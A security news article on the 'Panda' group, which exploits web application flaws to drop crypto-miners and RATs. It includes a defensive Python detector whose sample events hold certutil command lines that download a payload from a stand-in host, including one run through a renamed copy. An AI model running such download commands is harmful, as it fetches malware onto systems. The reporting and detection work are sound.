‘Panda’ Group Makes Thousands of Dollars Using RATs, Crypto-Miners

A new threat actor has generated thousands of dollars in the Monero cryptocurrency using remote access tools (RATs) and illicit cryptocurrency mining malware, Cisco’s Talos threat intelligence and research group revealed on Tuesday.


Although not highly sophisticated, the actor, which Talos refers to as Panda, is highly active, focused on persistently exploiting vulnerable web applications worldwide. The actor’s tools allow it to traverse networks, while the use of RATs also puts organizations at risk of data theft.

The group is capable of updating its infrastructure and exploits on the fly and relies on exploits released by Shadow Brokers for infiltration, as well as the open-source credential-dumping application Mimikatz.

Initially associated with last year’s MassMiner campaign, the threat actor was shortly after linked to another widespread mining campaign that used a different set of command and control (C&C) servers. Panda has since updated not only the infrastructure, but also its portfolio of exploits and payloads.

The cybercriminals, Talos’ security researchers say, have been observed targeting organizations in multiple industries, including those in the banking, healthcare, transportation, telecommunications, and IT services sectors.

In July 2018, the actor was exploiting a WebLogic vulnerability (CVE-2017-10271) to drop a miner associated with MassMiner. The hackers were mass-scanning for vulnerable servers and also attempted to exploit an Apache Struts 2 vulnerability (CVE-2017-5638). A PowerShell exploit was used to download a miner payload.

“In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000,” Talos says.

Panda was also observed using Gh0st RAT and dropping other hacking tools and exploits, including Mimikatz and exploits that the Shadow Brokers are said to have stolen from the National Security Agency (NSA).

Talos researchers spotted elements of the MassMiner attacks being used in a campaign that employed a different C&C server, suggesting that the same actor might have been behind both.

In January 2019, the threat actor was exploiting a flaw in the ThinkPHP web framework (CNVD-2018-24942) to spread similar malware. In March 2019, it was using new infrastructure, although the tactics, techniques, and procedures (TTPs) remained similar.

Soon after, Panda started employing an updated payload, which used the Certutil tool in Windows to download the secondary miner payload. Exploit modules designed for lateral movement were still used, many related to the NSA exploits.
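The certutil download step described above is what defenders most often catch, since certutil has no legitimate reason to be handed a URL on most hosts. As an added example that is not code from the article or from Talos, the following detector flags process-creation events in which certutil, identified by its PE OriginalFileName so that a renamed copy is still recognised, is launched with an http(s) URL on its command line; the event fields imitate Sysmon Event ID 1 and all sample values are constructed.

```python
"""Flag process-creation events where certutil.exe is used as a downloader.

Added example, not code from the article or from Talos. The events imitate
Sysmon Event ID 1 fields (Image, OriginalFileName, CommandLine, ParentImage);
field names and all sample values are constructed, not real indicators.
"""
import re
from dataclasses import dataclass

# A URL anywhere on certutil's command line is the tell-tale of download use;
# legitimate certificate maintenance works on local files and stores.
URL_RE = re.compile(r"https?://", re.IGNORECASE)


@dataclass
class ProcessEvent:
    image: str               # full path of the launched binary
    original_file_name: str  # PE header name; survives renaming the file on disk
    command_line: str
    parent_image: str


def is_certutil(ev: ProcessEvent) -> bool:
    """Identify certutil by OriginalFileName so a renamed copy is still caught."""
    name = ev.original_file_name or ev.image.rsplit("\\", 1)[-1]
    return name.lower() == "certutil.exe"


def find_certutil_downloads(events):
    """Return the events where certutil is launched with a URL on its command line."""
    return [ev for ev in events if is_certutil(ev) and URL_RE.search(ev.command_line)]


# Constructed sample telemetry (hostnames use the reserved .invalid TLD).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",
                 r"certutil -urlcache -split -f http://stage2.example.invalid/m.exe C:\Users\Public\m.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcessEvent(r"C:\Users\Public\cu.exe", "CertUtil.exe",  # renamed copy of certutil
                 r"cu.exe -urlcache -f HTTPS://stage2.example.invalid/m.exe m.exe",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",  # benign local use
                 r"certutil -hashfile C:\tools\setup.msi SHA256",
                 r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for ev in find_certutil_downloads(SAMPLE_EVENTS):
        print(f"certutil download: parent={ev.parent_image} cmd={ev.command_line}")
```

The parent image is worth keeping in the alert: a web server worker or PowerShell spawning certutil, as in the Panda chain, is far more suspicious than an administrator's interactive shell.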

Over the past month, Panda has updated its C&C and payload-hosting infrastructure, but the employed malware remains relatively similar to what was used in May 2019. In August, the hackers added another set of domains to their inventory, the researchers say.

“Panda’s operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated,” Talos concludes.

Related: MassMiner Attacks Web Servers With Multiple Exploits

Related: Stealthy Crypto-Miner Has Worm-Like Spreading Mechanism

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

